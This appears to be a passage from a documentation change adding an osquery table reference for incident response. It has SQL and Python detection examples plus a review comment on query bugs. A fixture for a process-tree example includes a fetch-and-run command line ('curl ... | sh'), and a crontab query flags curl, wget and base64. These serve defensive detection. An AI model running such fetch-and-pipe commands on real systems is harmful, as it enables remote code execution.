FROM launchd
WHERE run_at_load = 1;
-- Startup items
SELECT name, path, type, source
FROM startup_items;
```
**Windows:**
```sql
-- Registry Run keys
SELECT key, name, path
FROM registry
WHERE key LIKE '%Run%';
-- Scheduled tasks
SELECT name, action, enabled
FROM scheduled_tasks
WHERE enabled = 1;
```
### Package/Application Inventory
**Linux (Debian/Ubuntu):**
```sql
SELECT name, version, install_time
FROM deb_packages
ORDER BY install_time DESC;
```
**Linux (RHEL/CentOS):**
```sql
SELECT name, version, install_time
FROM rpm_packages
ORDER BY install_time DESC;
```
**macOS:**
```sql
SELECT name, path, bundle_version, last_opened_time
FROM apps
ORDER BY last_opened_time DESC;
```
**Windows:**
```sql
SELECT name, version, install_location, install_date
FROM programs
ORDER BY install_date DESC;
```
### Network Connections
**All Platforms:**
```sql
-- Active connections
SELECT p.name, p.cmdline, ps.remote_address, ps.remote_port, ps.state
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.state = 'ESTABLISHED';
```
**Platform-specific filtering:**
```sql
-- Linux: Filter by network namespace
SELECT * FROM process_open_sockets
WHERE pid IN (SELECT pid FROM processes WHERE root != '/');
-- macOS: Include code signature
SELECT p.name, ps.remote_address, s.authority
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
LEFT JOIN signature s ON p.path = s.path;
-- Windows: Include service name
SELECT p.name, s.name AS service_name, ps.remote_address
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
LEFT JOIN services s ON p.path = s.path;
```
## Platform Detection in Queries
Use `os_version` table to detect platform:
```sql
-- Get current platform
SELECT platform, name, version FROM os_version;
-- Platform-specific queries
SELECT CASE
WHEN platform = 'darwin' THEN (SELECT COUNT(*) FROM launchd)
WHEN platform LIKE '%linux%' THEN (SELECT COUNT(*) FROM systemd_units)
WHEN platform LIKE '%windows%' THEN (SELECT COUNT(*) FROM services)
ELSE 0
END AS persistence_count
FROM os_version;
```
## Best Practices for Cross-Platform Queries
1. **Check table availability** before querying:
```bash
osqueryi ".tables" | grep <table_name>
```
2. **Use platform detection** for conditional logic
3. **Test queries on each platform** - column names may vary slightly
4. **Document platform requirements** in query comments
5. **Create platform-specific query packs** for osqueryd
## Reference
- [osquery Schema Documentation](https://osquery.io/schema/)
- [Platform-specific table reference](https://osquery.io/schema/)
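Review bot: the Registry Run keys example `WHERE (key LIKE '%\\Run' OR key LIKE '%\\RunOnce') AND key NOT LIKE '%\\RunOnceEx'` has two problems: SQLite does not treat backslash as an escape in string literals, so `'%\\Run'` matches only keys ending in two backslashes followed by `Run` and the query returns nothing against real registry paths (use a single `\`), and the `NOT LIKE '%\\RunOnceEx'` clause is dead code because a key ending in `RunOnceEx` can never end in `Run` or `RunOnce`. Two further points: `SELECT * FROM selinux_events WHERE denied = 1;` references a column the table does not have (`selinux_events` exposes `type`, `message`, `time` and `uptime`), so filter on the message text instead, for example `WHERE message LIKE '%denied%'`; and the comment `-- Linux: Filter by network namespace` sits above `WHERE root != '/'`, which tests the process root directory (a chroot or container root), not its network namespace, so either reword the comment or join `process_namespaces` and compare `net_namespace`.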


@@ -0,0 +1,479 @@
# osquery Table Reference for Forensic Investigations
Comprehensive guide to osquery tables most relevant for incident response and forensic analysis.
## Table of Contents
- [Process Tables](#process-tables)
- [Network Tables](#network-tables)
- [File System Tables](#file-system-tables)
- [User and Authentication Tables](#user-and-authentication-tables)
- [System Information Tables](#system-information-tables)
- [Persistence Mechanism Tables](#persistence-mechanism-tables)
- [Platform-Specific Tables](#platform-specific-tables)
## Process Tables
### processes
Query running processes with detailed information.
**Key columns**: pid, name, path, cmdline, cwd, uid, gid, parent, pgroup, state, on_disk, start_time
```sql
-- Basic process listing
SELECT pid, name, path, cmdline, uid FROM processes;
-- Processes whose executable no longer exists on disk (binary deleted after
-- launch, a common malware trait); on_disk is -1 when the state is unknown
SELECT pid, name, path, cmdline, uid, parent FROM processes WHERE on_disk = 0;
-- Process tree
SELECT p1.pid, p1.name, p1.cmdline, p2.pid AS parent_pid, p2.name AS parent_name
FROM processes p1
LEFT JOIN processes p2 ON p1.parent = p2.pid;
```
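The process-tree join above shows one level of ancestry. Because osquery's SQL engine is SQLite, a recursive CTE can walk the whole chain from a suspicious process back to init, which is usually the first question in an investigation (what launched this?). The block below is an added example, not code from the original page or from the osquery project: an in-memory SQLite database loaded with constructed `processes` rows stands in for osquery's virtual table so the query can be tested offline, and the SQL itself runs unchanged in osqueryi once the `?` placeholder is replaced by a pid literal.

```python
"""Walk the osquery process tree with a recursive CTE (added example).

An in-memory SQLite table with a constructed subset of the osquery
`processes` schema stands in for the real virtual table.
"""
import sqlite3

# Constructed sample rows (pid, name, path, cmdline, parent, on_disk):
# a web server has spawned a shell, which runs a downloader whose binary
# in /tmp was deleted after it started.
SAMPLE_PROCESSES = [
    (1,    "systemd", "/usr/lib/systemd/systemd", "/sbin/init",                 0,    1),
    (900,  "nginx",   "/usr/sbin/nginx",          "nginx: worker process",      1,    1),
    (1200, "sh",      "/usr/bin/dash",            "sh -c curl http://x/a | sh", 900,  1),
    (1201, "curl",    "/tmp/.x/curl",             "curl http://x/a",            1200, 0),
    (2000, "sshd",    "/usr/sbin/sshd",           "sshd: alice [priv]",         1,    1),
]


def load_processes(rows=SAMPLE_PROCESSES):
    """Build the stand-in `processes` table from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE processes (pid INTEGER, name TEXT, path TEXT, "
        "cmdline TEXT, parent INTEGER, on_disk INTEGER)"
    )
    conn.executemany("INSERT INTO processes VALUES (?,?,?,?,?,?)", rows)
    return conn


# Same statement works in osqueryi with a pid literal instead of '?'.
ANCESTRY_SQL = """
WITH RECURSIVE chain(pid, name, parent, depth) AS (
    SELECT pid, name, parent, 0 FROM processes WHERE pid = ?
    UNION ALL
    SELECT p.pid, p.name, p.parent, c.depth + 1
    FROM processes p JOIN chain c ON p.pid = c.parent
    WHERE c.depth < 32          -- guard against loops from pid reuse
)
SELECT name FROM chain ORDER BY depth
"""

# Starting set: deleted binaries or binaries living in scratch directories.
SUSPECT_SQL = """
SELECT pid FROM processes
WHERE on_disk = 0 OR path LIKE '/tmp/%' OR path LIKE '/dev/shm/%'
"""


def ancestry(conn, pid):
    """Return process names from `pid` up to the root of the tree."""
    return [row[0] for row in conn.execute(ANCESTRY_SQL, (pid,))]


def suspicious_chains(conn):
    """Map each suspicious pid to its launch chain, child first."""
    return {pid: ancestry(conn, pid) for (pid,) in conn.execute(SUSPECT_SQL)}


if __name__ == "__main__":
    for pid, chain in suspicious_chains(load_processes()).items():
        print(pid, " <- ".join(chain))
```

The `depth < 32` guard matters on live hosts: pid reuse can make a stale `parent` value point at an unrelated, newer process, and without a bound the recursion could cycle.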
### process_open_sockets
Network sockets opened by processes.
**Key columns**: pid, socket, family, protocol, local_address, local_port, remote_address, remote_port, state
```sql
-- Active external connections (drop loopback, unbound and listening sockets)
SELECT p.name, p.pid, ps.remote_address, ps.remote_port, ps.state, p.cmdline
FROM processes p
JOIN process_open_sockets ps ON p.pid = ps.pid
WHERE ps.remote_address NOT IN ('', '127.0.0.1', '::1', '0.0.0.0', '::')
  AND ps.remote_port != 0;
```
### process_memory_map
Memory regions mapped by processes (useful for detecting injections).
**Key columns**: pid, start, end, permissions, path, pseudo
```sql
-- Executable mappings that are also writable (a classic injection trait),
-- or executable mappings backed by files in world-writable directories.
-- Note: pseudo = 1 marks [heap], [stack] and [vdso], which every process
-- has, so it is not an indicator on its own. JIT runtimes (Java, browsers)
-- legitimately create rwx regions; baseline them before alerting.
SELECT p.name, p.pid, pm.path, pm.permissions, p.cmdline
FROM process_memory_map pm
JOIN processes p ON pm.pid = p.pid
WHERE pm.permissions LIKE 'rwx%'
   OR (pm.permissions LIKE '%x%'
       AND (pm.path LIKE '/tmp/%' OR pm.path LIKE '/dev/shm/%'));
```
### process_envs
Environment variables for running processes.
**Key columns**: pid, key, value
```sql
-- Library-preload variables (hooking / injection). PATH exists in nearly
-- every process, so only flag it when it leads with a writable directory.
SELECT p.name, p.pid, pe.key, pe.value
FROM process_envs pe
JOIN processes p ON pe.pid = p.pid
WHERE pe.key IN ('LD_PRELOAD', 'LD_LIBRARY_PATH', 'DYLD_INSERT_LIBRARIES')
   OR (pe.key = 'PATH' AND (pe.value LIKE '/tmp/%' OR pe.value LIKE '.:%'));
```
## Network Tables
### listening_ports
Ports listening for connections.
**Key columns**: pid, port, protocol, family, address
```sql
-- Listening ports mapped to processes
SELECT lp.port, lp.protocol, lp.address, p.name, p.path, p.cmdline
FROM listening_ports lp
LEFT JOIN processes p ON lp.pid = p.pid
WHERE lp.address NOT IN ('127.0.0.1', '::1')
ORDER BY lp.port;
```
### interface_addresses
Network interface IP addresses.
**Key columns**: interface, address, mask, broadcast
```sql
-- List all network interfaces and addresses
SELECT interface, address, mask, type FROM interface_addresses;
```
### routes
System routing table.
**Key columns**: destination, netmask, gateway, source, interface, type
```sql
-- Check routing table
SELECT destination, netmask, gateway, interface FROM routes;
```
### arp_cache
ARP table entries (detect ARP spoofing).
**Key columns**: address, mac, interface, permanent
```sql
-- ARP cache analysis
SELECT address, mac, interface FROM arp_cache ORDER BY address;
```
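The listing above only dumps the cache; the spoofing signal is in the relationships between rows. Two conditions are worth checking: one MAC answering for several IPs on the same interface, and the default gateway's MAC also being claimed by another host, which is what a man-in-the-middle poisoning looks like from the victim. The block below is an added example, not from the original page or the osquery project: an in-memory SQLite database with constructed `arp_cache` and `routes` rows stands in for osquery's tables, and it assumes the default route is reported with destination `0.0.0.0` as osquery does on Linux (use `::` for IPv6). The SQL itself runs unchanged in osqueryi.

```python
"""Flag ARP-cache anomalies that suggest spoofing (added example).

Constructed rows in an in-memory SQLite database stand in for osquery's
`arp_cache` and `routes` tables.
"""
import sqlite3

# Constructed fixture: host 10.0.0.50 (mac ...:ee) has poisoned the cache
# so that its MAC now also answers for the gateway 10.0.0.1.
SAMPLE_ROUTES = [  # destination, gateway, interface
    ("0.0.0.0",  "10.0.0.1", "eth0"),
    ("10.0.0.0", "0.0.0.0",  "eth0"),
]
SAMPLE_ARP = [  # address, mac, interface
    ("10.0.0.1",    "aa:bb:cc:dd:ee:ee", "eth0"),   # gateway entry (spoofed)
    ("10.0.0.50",   "aa:bb:cc:dd:ee:ee", "eth0"),   # attacker host
    ("10.0.0.7",    "00:11:22:33:44:55", "eth0"),   # benign host
    ("192.168.1.1", "aa:bb:cc:dd:ee:ee", "wlan0"),  # same mac, other interface
]


def load_tables(routes=SAMPLE_ROUTES, arp=SAMPLE_ARP):
    """Build the stand-in tables from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE routes (destination TEXT, gateway TEXT, interface TEXT)")
    conn.execute("CREATE TABLE arp_cache (address TEXT, mac TEXT, interface TEXT)")
    conn.executemany("INSERT INTO routes VALUES (?,?,?)", routes)
    conn.executemany("INSERT INTO arp_cache VALUES (?,?,?)", arp)
    return conn


# One MAC for several IPs on the same interface.
SHARED_MAC_SQL = """
SELECT interface, mac, GROUP_CONCAT(address, ',') AS addresses
FROM arp_cache
GROUP BY interface, mac
HAVING COUNT(DISTINCT address) > 1
"""

# The default gateway's MAC is also claimed by a different IP.
GATEWAY_SQL = """
SELECT gw.address AS gateway, gw.mac, other.address AS also_claims
FROM routes r
JOIN arp_cache gw    ON gw.address = r.gateway AND gw.interface = r.interface
JOIN arp_cache other ON other.mac = gw.mac AND other.interface = gw.interface
                    AND other.address != gw.address
WHERE r.destination = '0.0.0.0'
"""


def shared_macs(conn):
    """Return [(interface, mac, sorted list of addresses)] for shared MACs."""
    return [(iface, mac, sorted(addrs.split(",")))
            for iface, mac, addrs in conn.execute(SHARED_MAC_SQL)]


def gateway_conflicts(conn):
    """Return [(gateway_ip, mac, other_ip)] when the gateway MAC is shared."""
    return list(conn.execute(GATEWAY_SQL))


if __name__ == "__main__":
    db = load_tables()
    print("shared MACs:", shared_macs(db))
    print("gateway conflicts:", gateway_conflicts(db))
```

Treat a hit as a lead rather than a verdict: routers with secondary addresses, VRRP/HSRP virtual IPs and some hypervisor bridges legitimately map several IPs to one MAC. The gateway check is the higher-fidelity one, and a change in the gateway's MAC between scheduled runs (visible in osqueryd's differential log) is the strongest single signal.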
## File System Tables
### file
Query file system metadata.
**Key columns**: path, directory, filename, size, mtime, atime, ctime, mode, uid, gid, type
```sql
-- Recently modified files in sensitive directories. The file table needs a
-- path constraint; '%' matches one directory level and '%%' recurses.
SELECT path, filename, mtime, uid, gid, mode
FROM file
WHERE path LIKE '/etc/%%'
   OR path LIKE '/usr/bin/%'
   OR path LIKE '/usr/sbin/%'
ORDER BY mtime DESC LIMIT 50;
-- SUID/SGID binaries. mode is a four-digit octal string ("4755") whose
-- leading digit holds setuid=4, setgid=2, sticky=1, so test those bits;
-- a bare mode LIKE '%4%' would match "0640" and miss "6755".
-- (The dedicated suid_bin table lists set-id files directly.)
SELECT path, filename, mode, uid
FROM file
WHERE (path LIKE '/usr/bin/%' OR path LIKE '/usr/sbin/%' OR path LIKE '/usr/local/%%')
  AND type = 'regular'
  AND (CAST(substr(mode, 1, 1) AS INTEGER) & 6) != 0;
```
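Because `file.mode` is a string, predicates on it are easy to get wrong, and a wrong predicate is silent: it returns rows, just not the right ones. The block below is an added example, not from the original page or the osquery project, that runs a naive digit-matching predicate and the bit-testing predicate side by side against constructed rows in an in-memory SQLite table standing in for osquery's `file` table. It assumes osquery's four-digit octal `mode` format; the `SETID_SQL` statement is plain SQLite and runs unchanged in osqueryi.

```python
"""Compare SUID/SGID predicates against osquery's `file.mode` format
(added example). Constructed rows in SQLite stand in for the file table."""
import sqlite3

# Constructed fixture: (path, mode). Only sudo, wall and odd carry set-id bits.
SAMPLE_FILES = [
    ("/usr/bin/sudo", "4755"),   # setuid root
    ("/usr/bin/wall", "2755"),   # setgid tty
    ("/usr/bin/ls",   "0755"),   # ordinary binary
    ("/etc/shadow",   "0640"),   # contains the digit 4 but is not set-id
    ("/tmp/drop",     "1777"),   # sticky only
    ("/usr/bin/odd",  "6755"),   # setuid and setgid
]


def load_files(rows=SAMPLE_FILES):
    """Build the stand-in `file` table from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE file (path TEXT, mode TEXT)")
    conn.executemany("INSERT INTO file VALUES (?,?)", rows)
    return conn


# Digit matching: flags any mode that merely contains a 4 or a 2.
NAIVE_SQL = """
SELECT path FROM file
WHERE mode LIKE '%4%' OR mode LIKE '%2%'
ORDER BY path
"""

# Bit testing on the leading octal digit: setuid=4, setgid=2.
SETID_SQL = """
SELECT path,
       (CAST(substr(mode, 1, 1) AS INTEGER) & 4) != 0 AS setuid,
       (CAST(substr(mode, 1, 1) AS INTEGER) & 2) != 0 AS setgid
FROM file
WHERE length(mode) = 4
  AND (CAST(substr(mode, 1, 1) AS INTEGER) & 6) != 0
ORDER BY path
"""


def naive_matches(conn):
    """Paths the digit-matching predicate returns (with its mistakes)."""
    return [row[0] for row in conn.execute(NAIVE_SQL)]


def setid_binaries(conn):
    """Return {path: (setuid, setgid)} for files with either bit set."""
    return {path: (bool(u), bool(g)) for path, u, g in conn.execute(SETID_SQL)}


if __name__ == "__main__":
    db = load_files()
    print("naive :", naive_matches(db))
    print("set-id:", setid_binaries(db))
```

On the fixture the naive predicate both over-reports (`/etc/shadow`, mode 0640) and under-reports (`/usr/bin/odd`, mode 6755, which contains neither digit), while the bit test returns exactly the three set-id files and tells setuid from setgid.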
### hash
File cryptographic hashes (MD5, SHA1, SHA256).
**Key columns**: path, directory, filename, md5, sha1, sha256, size
```sql
-- Hash files in suspicious locations
SELECT path, filename, md5, sha256
FROM hash
WHERE path LIKE '/tmp/%'
OR path LIKE '/var/tmp/%';
```
### file_events
Real-time file system change monitoring. Requires the FIM event publisher: a `file_paths` section in the osquery config listing the directories to watch, and events enabled in osqueryd (`--disable_events=false`); the table is empty in an ad-hoc osqueryi session.
**Key columns**: target_path, action, time, pid, uid, gid
```sql
-- Recent file modifications
SELECT target_path, action, time, pid
FROM file_events
WHERE action IN ('CREATED', 'UPDATED', 'DELETED')
AND time > strftime('%s', 'now') - 3600;
```
## User and Authentication Tables
### users
System user accounts.
**Key columns**: uid, gid, username, description, directory, shell
```sql
-- Users with login shells
SELECT username, uid, gid, shell, directory
FROM users
WHERE shell NOT LIKE '%nologin%' AND shell NOT LIKE '%false';
-- Highest uids (a rough view only; uid order is not creation order. To catch
-- additions, schedule SELECT * FROM users in osqueryd and alert on the
-- "added" rows of its differential log)
SELECT username, uid, shell, directory FROM users ORDER BY uid DESC LIMIT 10;
```
### logged_in_users
Currently logged-in users.
**Key columns**: user, tty, host, time, pid
```sql
-- Active user sessions
SELECT user, tty, host, time FROM logged_in_users;
```
### last
Login history (last command output).
**Key columns**: username, tty, pid, type, time, host
```sql
-- Recent login history
SELECT username, tty, host, time, type
FROM last
ORDER BY time DESC LIMIT 50;
```
### groups
User groups.
**Key columns**: gid, groupname
```sql
-- List all groups
SELECT gid, groupname FROM groups;
```
### user_groups
User-to-group mappings.
**Key columns**: uid, gid
```sql
-- Users in admin groups
SELECT u.username, g.groupname
FROM users u
JOIN user_groups ug ON u.uid = ug.uid
JOIN groups g ON ug.gid = g.gid
WHERE g.groupname IN ('sudo', 'wheel', 'admin', 'root');
```
## System Information Tables
### system_info
System hardware and OS information.
**Key columns**: hostname, uuid, cpu_type, cpu_brand, physical_memory, hardware_model
```sql
-- System information
SELECT hostname, cpu_brand, physical_memory, hardware_model FROM system_info;
```
### os_version
Operating system version details.
**Key columns**: name, version, major, minor, patch, build, platform
```sql
-- OS version
SELECT name, version, platform, build FROM os_version;
```
### kernel_info
Kernel version and parameters.
**Key columns**: version, arguments, path, device
```sql
-- Kernel information
SELECT version, arguments FROM kernel_info;
```
### uptime
System uptime.
**Key columns**: days, hours, minutes, seconds, total_seconds
```sql
-- System uptime
SELECT days, hours, minutes FROM uptime;
```
## Persistence Mechanism Tables
### crontab
Scheduled cron jobs (Linux/macOS).
**Key columns**: event, minute, hour, day_of_month, month, day_of_week, command, path
```sql
-- All cron jobs
SELECT event, command, path FROM crontab;
-- Suspicious cron commands
SELECT * FROM crontab
WHERE command LIKE '%curl%'
OR command LIKE '%wget%'
OR command LIKE '%/tmp/%'
OR command LIKE '%base64%';
```
### scheduled_tasks (Windows)
Windows scheduled tasks.
**Key columns**: name, action, path, enabled, state
```sql
-- Enabled scheduled tasks
SELECT name, action, path, state FROM scheduled_tasks WHERE enabled = 1;
```
### startup_items (macOS)
macOS startup items.
**Key columns**: name, path, args, type, source, status
```sql
-- macOS startup items
SELECT name, path, type, source FROM startup_items;
```
### launchd (macOS)
macOS launch agents and daemons.
**Key columns**: name, path, program, program_arguments, run_at_load, keep_alive
```sql
-- Launch agents/daemons that run at load
SELECT name, path, program, program_arguments
FROM launchd
WHERE run_at_load = 1;
```
### registry (Windows)
Windows registry access.
**Key columns**: key, name, type, data, path
```sql
-- Run / RunOnce keys for the machine hive and every loaded user hive.
-- The registry table needs a key constraint; '%' matches one key level,
-- so a leading wildcard such as '%Run%' is not a usable constraint.
SELECT key, name, data
FROM registry
WHERE key LIKE 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
   OR key LIKE 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
   OR key LIKE 'HKEY_USERS\%\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
   OR key LIKE 'HKEY_USERS\%\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce';
```
### services (Windows)
Windows services.
**Key columns**: name, display_name, status, path, start_type, user_account
```sql
-- Auto-start services
SELECT name, display_name, path, user_account
FROM services
WHERE start_type = 'AUTO_START';
```
### systemd_units (Linux)
Linux systemd services.
**Key columns**: id, description, load_state, active_state, sub_state, fragment_path
```sql
-- Active systemd services
SELECT id, description, active_state, fragment_path
FROM systemd_units
WHERE active_state = 'active';
-- Units whose file lives outside the package directories (admin- or
-- attacker-created, typically under /etc/systemd/system). Units without a
-- fragment (device, slice and target units) have an empty fragment_path.
SELECT id, description, active_state, fragment_path FROM systemd_units
WHERE fragment_path != ''
  AND fragment_path NOT LIKE '/usr/lib/systemd/system/%'
  AND fragment_path NOT LIKE '/lib/systemd/system/%';
```
## Platform-Specific Tables
### kernel_modules (Linux)
Loaded kernel modules.
**Key columns**: name, size, used_by, status, address
```sql
-- Loaded kernel modules
SELECT name, size, used_by, status FROM kernel_modules;
```
### kernel_extensions (macOS)
macOS kernel extensions (kexts). The table reflects what is currently loaded in the kernel (the `kextstat` view), so every row is loaded; there is no `loaded` column to filter on.
**Key columns**: idx, refs, size, name, version, linked_against, path
```sql
-- Loaded kexts that are not Apple-supplied (third-party drivers, rootkits);
-- Apple's own kexts live under /System/Library/Extensions
SELECT name, version, path FROM kernel_extensions
WHERE path NOT LIKE '/System/Library/Extensions/%';
```
### drivers (Windows)
Windows device drivers.
**Key columns**: device_id, device_name, image, provider, service, service_key
```sql
-- Loaded drivers
SELECT device_name, image, provider, service FROM drivers;
```
### chrome_extensions
Chrome browser extensions. The table reads each user's profile directory, so join it to `users` on `uid`; queried alone from a root osqueryd it only sees root's profiles.
**Key columns**: uid, name, identifier, version, description, path, author, permissions, update_url
```sql
-- Installed Chrome extensions for every local user
SELECT u.username, ce.name, ce.version, ce.update_url, ce.path
FROM users u
JOIN chrome_extensions ce USING (uid);
```
### firefox_addons
Firefox browser add-ons. As with `chrome_extensions`, join to `users` on `uid` to cover every profile.
**Key columns**: uid, name, identifier, version, description, source_url, visible, active, disabled, location
```sql
-- Installed Firefox add-ons for every local user
SELECT u.username, fa.name, fa.version, fa.source_url, fa.active
FROM users u
JOIN firefox_addons fa USING (uid);
```
## Query Optimization Tips
1. **Use WHERE clauses**: Always filter results to reduce query time
```sql
-- Bad: SELECT * FROM processes;
-- Good: SELECT * FROM processes WHERE uid = 0;
```
2. **Limit results**: Use LIMIT for large result sets
```sql
SELECT * FROM file WHERE path LIKE '/usr/%' LIMIT 100;
```
3. **Constrain required columns**: many tables generate rows on demand and need a constraint on a key column (pid, uid, path) to avoid walking the whole system; some, such as `file`, `hash` and `registry`, refuse to run without one
4. **Join efficiently**: put the cheaper, smaller table first and reach the expensive one through the join, so that only the matching rows are generated
```sql
SELECT * FROM listening_ports lp
JOIN processes p ON lp.pid = p.pid; -- listening_ports is usually smaller
```
5. **Time filtering**: Use time comparisons for event tables
```sql
WHERE time > (strftime('%s', 'now') - 3600) -- Last hour
```
## Reference
- [osquery Schema Documentation](https://osquery.io/schema/) (table schemas by osquery version)